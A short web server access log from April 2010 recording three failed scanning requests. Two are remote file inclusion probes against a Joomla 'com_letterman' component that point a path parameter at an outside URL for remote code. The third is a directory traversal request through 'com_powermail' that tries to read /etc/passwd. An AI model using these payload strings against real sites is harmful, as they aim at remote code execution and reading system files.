217.71.121.170 - - [09/Apr/2010:08:40:05 -0500] "GET /logs/access_log.1219708800//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://www.kyosan.com.tw/appserv/id1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.71.121.170 - - [09/Apr/2010:08:40:15 -0500] "GET /logs/access_log.1220054400//index.php?option=com_letterman&task=view&Itemid=&mosConfig.absolute.path=http://www.kyosan.com.tw/appserv/id1?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.121.17.40 - - [09/Apr/2010:08:41:21 -0500] "GET /index.php?option=com_powermail&controller=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""-"
